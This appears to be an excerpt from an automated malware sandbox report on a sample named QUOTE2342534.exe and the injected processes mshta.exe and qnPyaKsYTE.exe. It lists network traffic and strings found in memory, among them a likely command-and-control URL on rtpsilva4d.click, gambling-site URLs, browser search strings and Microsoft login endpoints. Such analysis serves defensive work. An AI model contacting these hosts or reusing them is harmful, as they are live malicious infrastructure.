            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Thu, 24 Oct 2024 13:21:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 24 Oct 2024 13:21:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 01 ad d4 bb b8 48 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 6e c9 ae 0d 85 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0b b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef 07 e3 30 75 ef 03 37 f4 83 0a 0c 7f 25 30 72 38 46 09 8c 7a 3f cb 32 ed c8 2f 7a 19 80 89 e2 ac 78 18 fc b3 77 69 ef a7 bd 8e 61 13 1c c3 91 f7 63 b9 e9 38 61 ea 3f 0c 6e fa 13 b3 f0 c3 f4 5d f7 7f 7e 67 bf 74 ed 2a cc d2 2f 40 f4 ac 72 8b 1b 7d 38 61 99 c7 26 d0 85 15 67 76 f4 7f b0 dd d7 1e 7f 26 d0 c8 ed 4e cf 4c de c7 ae 07 b4 64 d6 55 f6 7e b3 97 e1 e2 59 8b 3f 8e bf c9 3e 40 91 6b 0b bc 49 fa 15 20 32 cf d2 d2 bd 0f 53 2f bb 11 f4 55 af ec a5 bd ed 7d b5 bc ac cc aa 2e 81 75 1c f7 66 f1 05 35 cf e6 1f 22 c8 bf fc d1 ea c2 35 cb 2c fd 7c 3d 36 bc 5e df 43 f2 33 13 5c 71 76 d1 a9 5d 5d e4 fa f2 dd b2 40 de 7e af fb 3e 50 dc 6c f8 2a 2d 72 69 1f f2 db 63 a9 07 06 70 bc 0f d4 75 85 d6 c2 cd 5d 13 d8 0c 84 91 e7 9f 6f e4 7a f6 af 66 be ee 8a 51 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec 4a ca 5b 8e cc 4f 84 fa 75 12 f7 61 e5 26 e5 0d 99 ef 48 c2 00 8e 7e 70 a5 30 7d 73 65 0a ff 04 68 d7 f6 b8 a1 fe 82 63 2b ab aa 2c 79 18 f4 7b bc 09 db eb eb 0a 4b e8 e8 7a f0 4a 13 ef e8 df aa a1 37 f7 bd e3 da 59 61 f6 f6 7b 18 80 90 e2 16 7d 10 7a bf d1 ab c6 41 3c 62 d8 2b 6b 7c ba cf 43 90 35 6e 71 85 af f7 6c 3c 78 99 5d 97 9f 0f 9b 20 ce 34 b7 9e f3 ca 04 46 8f 08 6a f4 c6 e0 15 13 9f a3 f8 35 ae 7d 64 a8 5f 50 63 1d df d8 e6 bb a7 85 e9 25 66 7f 10 f3 e2 b0 ac ee 2f 69 a5 07 7c ea 0e b2 ba 2a 43 10 10 fa 8f 37 f6 7b 43 be 72 77 13 8c bf c3 eb aa ff 4d 5a c0 53 1c de b0 e5 c5 59 ef 5f 7d 64 7c bf c3 c5 d2 66 1c fa c0 c8 36 38 21 b8 c5 db f8 1b c9 af 37 7e f3 02 fa 8f 76 ba 24 5c 90 a3 3e 8b 61 7d 20 b8 0f 13 d3 bf 35 e3 77 a1 3e 8d bd 97 a5 fd 29 07 24 a8 5b f9 fa 9c db be e4 47 2b 8b 9d 37 29 7a 3d 5e 4b f9 a3 0e da ac 70 ee 2d 80 91 08 e4 a8 fe cf bd 19 c7 ef 09 fc 92 54 20 a9 03 70 0f 80 ae 40 96 b
            Source: mshta.exe, 00000008.00000002.4595178953.0000000004466000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000002DF6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
            Source: QUOTE2342534.exe, 00000000.00000002.2143831590.0000000002B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: QUOTE2342534.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.23.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/css/widget-blockquote.min.css?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.23
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.23.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css?ver=3.24.3
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.7
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/animations/styles/bounce.min.css?ver
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elemento
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.44
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/plugins/wp-staging/assets/js/dist/wpstg-blank-loader.min.js?ver=6
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/header-footer.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/style.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/themes/hello-elementor/theme.min.css?ver=3.1.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/global.css?ver=1728530365
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-12.css?ver=1728540809
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-51.css?ver=1728540719
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-content/uploads/elementor/css/post-8.css?ver=1728530364
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.coba168.info/xmlrpc.php
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpsilva4d.click
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4597123623.0000000004D3B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpsilva4d.click/3x2e/
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://app.ddgame168.online/utm-source/coba168-info
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mshta.exe, 00000008.00000003.2413498056.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://line.me/R/ti/p/
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mshta.exe, 00000008.00000002.4592995544.0000000002FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mshta.exe, 00000008.00000003.2408754560.0000000008214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mshta.exe, 00000008.00000002.4595178953.00000000058D0000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.0000000004260000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/WPFooter
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/WPHeader
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#/schema/logo/image/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#organization
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/#website
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/%e0%b8%9a%e0%b8%97%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/?s=
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/about-us/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/comments/feed/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/contact-us/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/feed/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/login/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/privacy-policy-2/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/promotion/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/register
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/sitemap_index.xml
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/slot-online/
            Source: mshta.exe, 00000008.00000002.4595178953.000000000478A000.00000004.10000000.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/terms-and-conditions/
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/08/5.png
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/10/COBA-168-
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-content/uploads/2024/10/cropped-COBA-168-
            Source: qnPyaKsYTE.exe, 0000000A.00000002.4594821635.000000000311A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.coba168.info/wp-json/
